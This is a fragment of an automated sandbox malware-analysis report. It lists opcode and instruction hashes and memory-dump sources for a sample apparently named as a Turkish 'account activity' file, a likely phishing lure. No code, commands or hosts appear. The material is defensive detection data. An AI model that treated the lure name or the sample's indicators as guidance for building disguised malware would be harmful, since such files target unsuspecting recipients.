                                        • Opcode ID: 99c0c027a59928eeed2c6c851b13e67ef2b095703faf884ad3508398f1d31da0
                                        • Instruction ID: 50e9b7de611b765ccde5eec5dae7dff851b5f90cc4bf93dac9d561b2d81beada
                                        • Opcode Fuzzy Hash: 99c0c027a59928eeed2c6c851b13e67ef2b095703faf884ad3508398f1d31da0
                                        • Instruction Fuzzy Hash: 893183B4918389CFCB05CFA9E5865EDBFF5BB4A300F6491D6D404AB352D7709A40CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5195ebc48ec1a3b04408a5281aa9b9dbfd8d493aa4ed1e51aedce8d42aa0f506
                                        • Instruction ID: 0fe6cc258cd82002519793c82de6ad22418230c9ae07b98f9be104093d3bcf0b
                                        • Opcode Fuzzy Hash: 5195ebc48ec1a3b04408a5281aa9b9dbfd8d493aa4ed1e51aedce8d42aa0f506
                                        • Instruction Fuzzy Hash: 033113B4E10219DBDB04CFA9E8455DEBBF2FF89310F14942AE415A7350DB346941CF60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb647c068ad596723549e29f530f55e652930f99d09e1e859fc32666fde73c44
                                        • Instruction ID: 394bfe6d6155796ec3723ef47dca1afaef5bbc3cbc0d3e829daab096f09fc168
                                        • Opcode Fuzzy Hash: eb647c068ad596723549e29f530f55e652930f99d09e1e859fc32666fde73c44
                                        • Instruction Fuzzy Hash: 3E214CB5E18214DFD708CF6AE8048EDBBBABBCA301B44C12AE504A7291C7305906CFA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd879ad920a790b98f93d0dfd6f60ca81ae5d4d81fe4276d40a4e616beafdf4f
                                        • Instruction ID: 1f951244a61ee903ae6b6c3a70b686d7779716b66db47cc33560b9e26785cb34
                                        • Opcode Fuzzy Hash: bd879ad920a790b98f93d0dfd6f60ca81ae5d4d81fe4276d40a4e616beafdf4f
                                        • Instruction Fuzzy Hash: A9312BB4929108CFDB14CF54E985DECB7BABF4E301F649595D40AA7295C731AD42CF20
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5cce79a2a60faae1b07ea6d98bb1f41bd39edc84ab8c0b4de970c0f4c3f76482
                                        • Instruction ID: 4017d3d1a5884eb6affb3d457f21ee10f1aeccd9d761d35d48a60291726a01c9
                                        • Opcode Fuzzy Hash: 5cce79a2a60faae1b07ea6d98bb1f41bd39edc84ab8c0b4de970c0f4c3f76482
                                        • Instruction Fuzzy Hash: 6E210071100204DFDB06DF98D980B6ABFB5FBC8324F60C569E9090F256C37AE416CAA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cffa21f2f76861e2fec62c459f35fd37e394e4e5738a325a774117631c30998
                                        • Instruction ID: 3ec12c9a91ae9b7abad04b70e8e76d8a4f01af90f0618b48dc0fc10a0818aaaa
                                        • Opcode Fuzzy Hash: 8cffa21f2f76861e2fec62c459f35fd37e394e4e5738a325a774117631c30998
                                        • Instruction Fuzzy Hash: 8F21F171500240DFDB06DF58D9C0B2ABFB5FBC8318F60C569E9090F296C33AD416CAA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147865492.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_154d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 22b9f4d3f2bc1dc4093e9fe9112a0cd2a7ebbcbba658bf784dc4bccf674d8a04
                                        • Instruction ID: 4ca1c2fe6b47f2ccf6882007124fa3fa233cece265550e9b77668ad671d93809
                                        • Opcode Fuzzy Hash: 22b9f4d3f2bc1dc4093e9fe9112a0cd2a7ebbcbba658bf784dc4bccf674d8a04
                                        • Instruction Fuzzy Hash: 8021F571608204DFDB05DF98D5C0B26BBB5FB94328F20CA6DE9094F356C33AD406CA61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147865492.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_154d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a768e53fbaef019fe72fc2cebbb2973634005be5b33b93b403a9dd27557962ca
                                        • Instruction ID: 2dba4fa1a507636bd85d595871f153c065be8a0194f2b61607b9553e49dbc1f1
                                        • Opcode Fuzzy Hash: a768e53fbaef019fe72fc2cebbb2973634005be5b33b93b403a9dd27557962ca
                                        • Instruction Fuzzy Hash: FA210071604204DFCB15DFA8D984B26BFB5FB98318F20C96DD90E0F256D33AD406CA61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b3764242eca5483d1aabfbe82f49cb1e7312b57c1e94a068bdd1c172fbaed81
                                        • Instruction ID: a9ca979e554639c8dcf1d92df7a1c1de3a22551d6e9e87c3a85cfee87963bf5b
                                        • Opcode Fuzzy Hash: 8b3764242eca5483d1aabfbe82f49cb1e7312b57c1e94a068bdd1c172fbaed81
                                        • Instruction Fuzzy Hash: 0C216AF4D15209EFCB44DFA9E54569EBBF6FB88210F10C1AA9408A3384EB309A51DB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 058eef641e5d15b39013f5e2a01a5a234b157dd8865b34a33118de7cc60b10d0
                                        • Instruction ID: b6adb289bae844b772d4ab8764204d4faf5e10862440f7d3394ec74cc7b37ba9
                                        • Opcode Fuzzy Hash: 058eef641e5d15b39013f5e2a01a5a234b157dd8865b34a33118de7cc60b10d0
                                        • Instruction Fuzzy Hash: 191136303003124BE714AB6CD5553AA77E9AFC0714F00856EC089CF3D2CAFA584687A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b09512bb7d4169ed1a1793ff4f9b60b43f6760a3f17a984741d28a7ec77526d
                                        • Instruction ID: c5d7daa76aefc47f61192a6287082dba0209ebbc0a18f92908051ff06737a8db
                                        • Opcode Fuzzy Hash: 0b09512bb7d4169ed1a1793ff4f9b60b43f6760a3f17a984741d28a7ec77526d
                                        • Instruction Fuzzy Hash: EE211DF4D14249CFCB44CFA9E5829EEBBF9BB49300F609495D809A7351D770AE40CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48b3bc5dbb078ed10ae326446328cd582f3cc4570429b4270d2b1d8239ad65ef
                                        • Instruction ID: 4f95df95c1a14b0db1a2ba3ec4547182f9f2bfa16d684974aa7d8e9e7e32d1ba
                                        • Opcode Fuzzy Hash: 48b3bc5dbb078ed10ae326446328cd582f3cc4570429b4270d2b1d8239ad65ef
                                        • Instruction Fuzzy Hash: 6C21A0B0C01218DFDB20DF9AD588BDEBBF5BB48314F24845AE408BB290C7B55945CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c304515f05da038c5535e729a8fac970cc87caebe4d8b0525cdaecd9d5c1a9b2
                                        • Instruction ID: f40efd85a054a1d908b070d7caa04456aa19347202b3cfc4406a7d6fb38c639d
                                        • Opcode Fuzzy Hash: c304515f05da038c5535e729a8fac970cc87caebe4d8b0525cdaecd9d5c1a9b2
                                        • Instruction Fuzzy Hash: B0217CB0E14209DBCB08CFAAE88059DFBF2FF89300F14C9AA94149B255E7709A01DF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147865492.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_154d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47fe8ab560467fca09b7f923b8fb66656637e296cb3c683062ca4ca7506c665c
                                        • Instruction ID: 4cd675f232322b3617922ae720d7652de5121e5352474647023de0642ea363f9
                                        • Opcode Fuzzy Hash: 47fe8ab560467fca09b7f923b8fb66656637e296cb3c683062ca4ca7506c665c
                                        • Instruction Fuzzy Hash: F12192755093808FDB13CF64D994715BF71FB46214F28C5DAD8498F2A7C33A980ACB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a6f48bdfa904ea329fd6ea5e957f85ae36afa2d8c9a2d2ed5deb2afab268e97
                                        • Instruction ID: 0f7585ea8e4d52ec0b32d793f1c9cfb4db11428ed4831f83387b5d479de67236
                                        • Opcode Fuzzy Hash: 2a6f48bdfa904ea329fd6ea5e957f85ae36afa2d8c9a2d2ed5deb2afab268e97
                                        • Instruction Fuzzy Hash: 2F21E8B4A29118CFDB10CF54E585DECBBBABB4A300F50E995E80AA7255C731E942CF64
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e936035546ab32978ca4be99c1316481555c4c2d7e632f4a8b31a7c39a36080a
                                        • Instruction ID: c6cc15b90a78a5d4b90dfee2f9a26e9230f4825e7ba1d12eedf87bda252add69
                                        • Opcode Fuzzy Hash: e936035546ab32978ca4be99c1316481555c4c2d7e632f4a8b31a7c39a36080a
                                        • Instruction Fuzzy Hash: D921EAB8D14249CFCB44CF99D5829EEBBF9BB49300F60A495D809AB711D730AE40CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41d4eecd9b9b4b2ce6f89875ac36504e8805029798379d5b08817637bc6a1d67
                                        • Instruction ID: c10c76033bbb735de14f609efc01b3cef939ffa2c87ef1cacc93a3b676f737fc
                                        • Opcode Fuzzy Hash: 41d4eecd9b9b4b2ce6f89875ac36504e8805029798379d5b08817637bc6a1d67
                                        • Instruction Fuzzy Hash: A9113DB1900219DFDB14DF6AD8446AEBBF1FF88320F14C62AE529DB2A0D7709944CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfaa103589fd2e4b8a8dead4351ce8ffda150f28241c78dd0e307854574b4dab
                                        • Instruction ID: 4e0c5e6557fa4e740f2ffd18ea6969903c51da605321053e8f928adcda526964
                                        • Opcode Fuzzy Hash: dfaa103589fd2e4b8a8dead4351ce8ffda150f28241c78dd0e307854574b4dab
                                        • Instruction Fuzzy Hash: 7E11DAB0D18218DBDB08CFAAD8445EDBBFABF8E301F10D466E819A7291DB305506CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56d48d696bfa4d14f4405354fbebbc9794e1c9ffa34e675c428c484cb89c1e93
                                        • Instruction ID: a6d09998e04a059e5a1c972d87d0aafa26e926c5fa8fc413ec2424f36269c108
                                        • Opcode Fuzzy Hash: 56d48d696bfa4d14f4405354fbebbc9794e1c9ffa34e675c428c484cb89c1e93
                                        • Instruction Fuzzy Hash: EE11C2B5A00A1A8BCB15DEA998445BFB7F6FFC82A0B154529D859D7340EF308D068791
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aafd9eac5fb19235405765aa9c3a96ea2cd36ece5b17dd6e1b7d59789e40fa98
                                        • Instruction ID: 351eab98db8fdb26fd4bf6f33174e628ed019a1362989fb6db4dd610c84f2203
                                        • Opcode Fuzzy Hash: aafd9eac5fb19235405765aa9c3a96ea2cd36ece5b17dd6e1b7d59789e40fa98
                                        • Instruction Fuzzy Hash: 751129B0E14209EBCB08CFAAE94059DFBF6FF89301F14D9AA941597214EB709A41DF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeb2fc0ef952b856746c9c80be531467a86bb9581a8ed851889c76815f46b2b7
                                        • Instruction ID: 88cd3a58d47bc3c4f79fffb5c2925db7442d2dde6c4601fe58ba0524a6bc5d77
                                        • Opcode Fuzzy Hash: aeb2fc0ef952b856746c9c80be531467a86bb9581a8ed851889c76815f46b2b7
                                        • Instruction Fuzzy Hash: 772114B58003499FCB10CF9AD884ADEBBF4FB48310F10841AE918A7210D379A944CFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b889993ad417cff5ef9b8bd6da05c1d7e7b20aff7d7bf3312803c74733be551b
                                        • Instruction ID: 26c07c8f362be92ed5e93a5126be80617ec4c91b67affef5b19f69c94a937794
                                        • Opcode Fuzzy Hash: b889993ad417cff5ef9b8bd6da05c1d7e7b20aff7d7bf3312803c74733be551b
                                        • Instruction Fuzzy Hash: 5B110AB4E04209EFCB44DFA9D585A9DFBF6FF8C200F14D9A5941897364DB309A00DB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 3d9cde12c686423184e008edff3eca458b30a38975032649d7e3169ac874ca17
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: 0C11CD72404240CFDB02CF54D5C4B5ABF71FB84224F24C6A9D9490B256C33AE45ACBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 7cb5e8e7bb751be5de9faa39a33a785070d04c92c205f5be198104c7748748c0
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: EB11DF72504280CFCB02CF54D5C4B1ABF71FB88314F24C6A9D9490F256C33AD45ACBA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65d0cf0c153beb4d0fb05ba67142e02ad0dd71ffb7d9db8e02298949c7ce3684
                                        • Instruction ID: 2c43a9706b2d29f493dac61b87596d9a7c0cb51ffe0a29b20baaf393133f3677
                                        • Opcode Fuzzy Hash: 65d0cf0c153beb4d0fb05ba67142e02ad0dd71ffb7d9db8e02298949c7ce3684
                                        • Instruction Fuzzy Hash: CC11DAB4D19249DFCB04DFA9D5419EDBBF9BF49310F1199E6D408AB211D7309A45CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 896d5da62d9c93fc4cb98f7231628931bb0ee474e31509fc128fb7432b05392c
                                        • Instruction ID: 05b1e9df7a2317a8d44c8d461ad69d9a7349d4837a526626048f98a71349e422
                                        • Opcode Fuzzy Hash: 896d5da62d9c93fc4cb98f7231628931bb0ee474e31509fc128fb7432b05392c
                                        • Instruction Fuzzy Hash: 1011F8B0D14619CBEB18CF67D8456EEFAFBBFC9300F04D47A9409A6254DB300A46DE90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147865492.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_154d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction ID: 9f95a5a80a87fac9c24fc8605f17cd60585e91885127be41bffd008a851bedb0
                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction Fuzzy Hash: F311BB75508280DFDB02CF54C5C4B19BFB1FB84228F24C6A9D8494F296C33AD40ACB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe994aa38f52933bb4e30bd884b32fe1e835428d28dd30184ea5174293e7f7a2
                                        • Instruction ID: 269b3947365c78955365b8736a78fd91c71019040ad7b4b012af9bf8fe83d5df
                                        • Opcode Fuzzy Hash: fe994aa38f52933bb4e30bd884b32fe1e835428d28dd30184ea5174293e7f7a2
                                        • Instruction Fuzzy Hash: 5711A5B4E18249DFCB08DFA9D5819EDBBF9BB49310F1099E59418AB315D730AA41CB80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d53a1ef4c7126a15a464abce30208b8c547e9cae0202019f0a18d1ae3bbf5f5b
                                        • Instruction ID: a3a25061afd98ee8331d75a4b5baf6e10dda836ec46d644db7017fe0adf8985d
                                        • Opcode Fuzzy Hash: d53a1ef4c7126a15a464abce30208b8c547e9cae0202019f0a18d1ae3bbf5f5b
                                        • Instruction Fuzzy Hash: 2301B1303503225BE714AB6CD4147AA76EAAFC4718F10C56DD5898F3D2CEFAA84647E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a2f71a19295a7e586532fa178e5635d7fbc68bd39ff7e4f3016277f92734d0b
                                        • Instruction ID: 9aaae49be1cdc96add4cfe9ab566015af080495e685128744b40e045bd6624f8
                                        • Opcode Fuzzy Hash: 7a2f71a19295a7e586532fa178e5635d7fbc68bd39ff7e4f3016277f92734d0b
                                        • Instruction Fuzzy Hash: F3016D76B005149FC7049B6AE884E6AB7EAFFD8621B51807AF509DB360DE31DC01C694
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac8dd7ec46daa050ac770345a4b20c8c9feeca20eebd67934f88445c66b1e263
                                        • Instruction ID: e14e789b5515c77aaf8965ffc74cfc01df3a0bd7828d9b5d2b8d7db8748b22e2
                                        • Opcode Fuzzy Hash: ac8dd7ec46daa050ac770345a4b20c8c9feeca20eebd67934f88445c66b1e263
                                        • Instruction Fuzzy Hash: 4511C2B4A14118CFCB14CF54E9859ECBBBABB4E311F909595E80AA7351DB31AD82CF20
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2147745248.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_153d000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 840185597b116e8da400c9faf22c1767a2162f4f057491eb57609a27d1d1d7fe
                                        • Instruction ID: b8eec1a212ff4aac658b71297344b20089f7e7ff0016a70207e5f84bc6618ccf
                                        • Opcode Fuzzy Hash: 840185597b116e8da400c9faf22c1767a2162f4f057491eb57609a27d1d1d7fe
                                        • Instruction Fuzzy Hash: EC01FC310043809AE7124A59CD84B66BFFCFF85360F54C969ED090F286C2399400CA71
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ed58f0fca8242b642c7e2b9f56a2bde03352b4c6e6cd0b6d2adbb2ee48c8522
                                        • Instruction ID: e1206ad4d4c608b5064ca922b0f669a08210753fd7e6a0548ee6aa6f49f1dd2e
                                        • Opcode Fuzzy Hash: 4ed58f0fca8242b642c7e2b9f56a2bde03352b4c6e6cd0b6d2adbb2ee48c8522
                                        • Instruction Fuzzy Hash: 5F0129B4E15209DFCB44CFA9E5456AEFBF6BB88200F10C5AA8409E3344EB309A41CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fef1c8f7cda752d9973f986463e7b519f623f63b9fb55582c9fea1d45976b96b
                                        • Instruction ID: 96f1cc45355f48dd2b3665e6dd2d10505e43729c58a7c344ea1f8bcdf03ec51c
                                        • Opcode Fuzzy Hash: fef1c8f7cda752d9973f986463e7b519f623f63b9fb55582c9fea1d45976b96b
                                        • Instruction Fuzzy Hash: 28017CF5E18209DFCB04CBA8E98169DBFB3FB45210F2485EAD81997380E7359A51DB41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e07b8f8c744f16684aa6d3db10e89005aaf4678daa451887522ded63f453840
                                        • Instruction ID: f3834d783d84ac9af94c9e71567797e2fab5f9aec5dfb4b4bf906c64ab18cfcd
                                        • Opcode Fuzzy Hash: 1e07b8f8c744f16684aa6d3db10e89005aaf4678daa451887522ded63f453840
                                        • Instruction Fuzzy Hash: 4D0112B4A19104CFCB10CF54E585DECB7BAFB0A301F50A496E40AA7251DB319942CF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cd628c3ccac5e89a61b068bd2e19b947cd8cbea23fa267f34c50695193ad2bb
                                        • Instruction ID: 7ef1aad8942cc8fe2c30dcf8a1c154c78ae76d90ea3a812e8552d470a8500296
                                        • Opcode Fuzzy Hash: 7cd628c3ccac5e89a61b068bd2e19b947cd8cbea23fa267f34c50695193ad2bb
                                        • Instruction Fuzzy Hash: F20152B0929154CFC710CF14E9859EC7BBEBF4A301F449896D40AA7396DB319846CF54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a59727095dc0b35beff1a97f48eef10f82341111cf5d2bab3370ef4e43177d4
